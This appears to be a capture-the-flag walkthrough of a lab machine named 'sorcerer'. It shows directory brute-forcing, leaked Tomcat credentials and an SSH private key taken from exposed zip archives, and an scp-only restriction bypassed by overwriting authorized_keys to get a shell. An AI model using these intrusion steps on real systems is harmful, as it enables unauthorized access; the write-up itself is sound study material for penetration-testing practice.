4 :7742
http://192.168.197.100:7742/
Control Panel Log in page.
$ gobuster dir -u http://192.168.197.100:7742 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/default (Status: 301) [Size: 178] [--> http://192.168.197.100:7742/default/]
/index.html (Status: 200) [Size: 1219]
/zipfiles (Status: 301) [Size: 178] [--> http://192.168.197.100:7742/zipfiles/]
http://192.168.197.100:7742/default/
Page loaded with message: 404 Not Found
# could be same as :80 landing page
http://192.168.197.100:7742/zipfiles/
Index of /zipfiles/
../
francis.zip 24-Sep-2020 19:27 2834
max.zip 24-Sep-2020 19:27 8274
miriam.zip 24-Sep-2020 19:27 2826
sofia.zip 24-Sep-2020 19:27 2818
# all others are basically empty /home/<user> dirs
$ unzip max.zip
Archive: max.zip
creating: home/max/
inflating: home/max/.bash_logout
inflating: home/max/.profile
creating: home/max/.ssh/
inflating: home/max/.ssh/id_rsa.pub
inflating: home/max/.ssh/authorized_keys
inflating: home/max/.ssh/id_rsa
inflating: home/max/tomcat-users.xml.bak
inflating: home/max/.bashrc
inflating: home/max/scp_wrapper.sh
# exploring max.zip
$ cat tomcat-users.xml.bak
<role rolename="manager-gui"/>
<user username="tomcat" password="VTUD2XxJjf5LPmu6" roles="manager-gui"/>
$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
scp
;;
esac
$ ssh -i id_rsa max@192.168.197.100
The authenticity of host '192.168.197.100 (192.168.197.100)' can't be established.
ECDSA key fingerprint is SHA256:1PY83TEUQqDNgXXB6iOOdqU+i3fBhc1zk4eg8yQyiXQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.197.100' (ECDSA) to the list of known hosts.
PTY allocation request failed on channel 0
ACCESS DENIED.
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
[-l limit] [-o ssh_option] [-P port] [-S program] source ... target
Connection to 192.168.197.100 closed.
# basically ssh command calls scp
# scp actually uses ssh to transfer files over
# maybe we need to use scp to run it
$ scp -i id_rsa web.php max@192.168.197.100:/var/www/html
scp: /var/www/html/web.php: Permission denied
# not writable maybe?
$ scp -i id_rsa web.php max@192.168.197.100:/tmp
web.php 100% 7205 94.7KB/s 00:00
# success
# as we cannot write in /var/www/html - can't use shell
# lets just put .ssh key in /home/max/.ssh/
# generate ssh key
# use max id_rsa to transfer custom id_rsa.pub to /home/max/.ssh/
$ scp -i id_rsa ../../../id_rsa.pub max@192.168.197.100:/home/max/.ssh/authorized_keys
id_rsa.pub
# connect using custom id_rsa
$ ssh -i ../../../id_rsa max@192.168.197.100
max@sorcerer:~$ whoami;id;hostname;uname -a
max
uid=1003(max) gid=1003(max) groups=1003(max)
sorcerer
Linux sorcerer 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/LinuxAlternate Method
Last updated